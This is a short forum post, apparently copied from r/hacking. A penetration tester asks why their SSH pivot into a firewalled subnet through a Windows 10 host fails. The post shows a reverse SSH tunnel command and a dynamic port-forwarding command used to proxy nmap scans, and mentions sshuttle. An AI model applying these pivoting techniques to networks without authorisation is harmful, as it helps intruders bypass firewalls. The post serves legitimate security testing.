Pivoting through a Network – Digitalmunition


Home Forums Pivoting through a Network

This topic contains 0 replies, has 1 voice, and was last updated by  anonymous 1 month, 2 weeks ago.

  • Author
  • #336211


    Hello r/hacking!

    I’m really stumped on this networking issue, so I’m outsourcing help to internet strangers!

    I’m doing a pentest, and I need help with tunneling traffic into a subnet using a windows machine that I only (initially) had RDP access to.

    I have a box that I’m hosting an SSH server on, the attacking machine linux, and the target machine, windows 10, running RDP.

    All incoming traffic to the Windows server is blocked my a firewall with the exception of RDP.

    I downloaded [this](https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse) OpenSSH for Windows, and started the service. I then ran:

    C:\>ssh -i key.pem -R 4545:localhost:22 [[email protected]](mailto:[email protected])

    On the kali machine, I can now access the SSH server running on the Windows machine.

    I tried to do dynamic port forwarding like this:

    ssh -D 4547 -N -f [[email protected]](mailto:[email protected]) -p 4545 -v

    To no avail. I can’t route traffic to that subnet using this method when I kick off nmap scans with the –proxy option, and I can’t do local nmap scans or connect to ports running on the windows machine. What am I doing wrong?

    and also tried using [https://github.com/sshuttle/sshuttle](https://github.com/sshuttle/sshuttle), but sshuttle encountered errors with Windows 10 servers as hop servers, not sure if its made for Windows.

    Any tips? Thank you so much!

You must be logged in to reply to this topic.